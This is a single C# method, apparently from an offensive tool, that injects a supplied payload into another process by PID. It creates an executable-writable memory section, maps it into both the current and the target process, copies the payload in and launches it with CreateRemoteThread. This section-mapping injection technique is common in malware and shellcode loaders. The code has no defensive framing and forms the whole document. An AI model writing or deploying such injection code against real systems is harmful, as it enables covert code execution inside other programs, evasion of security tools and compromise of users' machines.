public static bool OpenAndInject(int pid, byte[] payload) { IntPtr hproc = OpenProcess(pid); uint size = InjectionHelper.GetSectionSize(payload.Length); //Crteate section in current process IntPtr section = IntPtr.Zero; section = InjectionHelper.CreateSection(size, Natives.PAGE_EXECUTE_READWRITE); if (section == IntPtr.Zero) { return(false); } //Map section to current process IntPtr baseAddr = IntPtr.Zero; IntPtr viewSize = (IntPtr)size; InjectionHelper.MapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, ref viewSize, Natives.PAGE_EXECUTE_READWRITE); if (baseAddr == IntPtr.Zero) { return(false); } //Copy payload to current process section Marshal.Copy(payload, 0, baseAddr, payload.Length); //Map remote section IntPtr baseAddrEx = IntPtr.Zero; IntPtr viewSizeEx = (IntPtr)size; InjectionHelper.MapViewOfSection(section, hproc, ref baseAddrEx, ref viewSizeEx, Natives.PAGE_EXECUTE_READWRITE); if (baseAddrEx == IntPtr.Zero || viewSizeEx == IntPtr.Zero) { return(false); } if (!InjectionHelper.UnMapViewOfSection(baseAddr)) { return(false); } Natives.CreateRemoteThread(hproc, IntPtr.Zero, 0, baseAddrEx, IntPtr.Zero, 0, IntPtr.Zero); Natives.CloseHandle(section); Natives.CloseHandle(hproc); return(true); }